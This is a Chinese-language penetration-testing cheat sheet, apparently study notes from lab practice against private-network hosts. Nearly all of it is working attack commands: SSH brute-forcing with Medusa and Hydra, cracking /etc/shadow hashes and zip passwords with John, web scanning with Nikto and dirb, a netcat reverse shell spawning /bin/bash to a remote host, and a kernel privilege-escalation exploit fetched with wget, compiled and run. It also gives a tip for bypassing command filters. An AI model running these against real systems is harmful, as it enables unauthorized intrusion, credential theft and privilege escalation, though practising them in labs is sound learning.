1、美杜莎爆破
medusa -M ssh -h 192.168.42.135 -u guest -P top1000.txt -t 8
2、passwd文件与shadow文件
root:x:0:0:root:/root:/usr/bin/zsh
用户名:密码:uid:gid:描述性信息:主目录:默认shell (nologin为禁止登陆)
root:$y$j9T$qOgIxPawKD/eOVjjZBtAJ1$vHC6fSvBC3KDEINrK1u5Jb4Lgtv4NdMUGgXmUTl0l/A:19570:0:99999:7:::
用户名:
密码:
最近一次修改密码的时间(修改时间-1970/1/1的天数):
修改密码的间隔时间(在该时间段内不允许修改密码):
密码有效期:
密码过期前的警告提醒天数:
密码过期后宽限多少天:
账号失效时间:
保留字段
$1$ MD5
$y$ yescrypt
$5$ SHA256
$6$ SHA512
3、john解密
john /etc/shadow --format=crypt
zip压缩包密码解密
zip2john test.zip > test_pass.txt
john test_pass.txt
4、web服务器扫描之nikto
nikto--------web安全扫描工具
nikto -h http://192.168.42.141
dev_shell.php php+mysql开源框架后台管理界面
/bin目录下存在大部分内核指令,可直接通过/bin/+命令绕过大多数简单的命令字符过滤
5、利用nc进行反弹shell
nc -lvp 6666 服务端开放并监听通信端口
nc -e /bin/bash 192.168.42.134 6666 客户端连接后启动shell
利用python模块让nc反弹shell 美化界面
python -c “import pty;pty.spawn('/bin/bash')" pty-----伪终端实用程序
6、gpg文件的解密
gpg --batch --passphrase 密钥 -d 需要解密的文件
gpg最简单的用法
gpg -o 解密后存储的文件 -d 需要解密的文件
7、dirb----web目录文件扫描
dirb http://192.168.42.142
8、海德拉爆破
hydra -l potato -P webshell.txt 192.168.42.142 -s 7120 -vV -f ssh
ssh potato@192.168.42.142 -p 7120
uname -a 发现版本较低
9、查找对应内核版本存在的漏洞
searchsploit ubuntu 3.13.0
指定漏洞所在的路径
searchsploit -p 37292.c
wget http://192.168.42.133/37292.c
gcc 37292.c -o exp
chmod 777 exp
./exp
10、信息收集--永恒之眼
nmap 192.168.42.0/24
nmap -A 192.168.42.142 -p-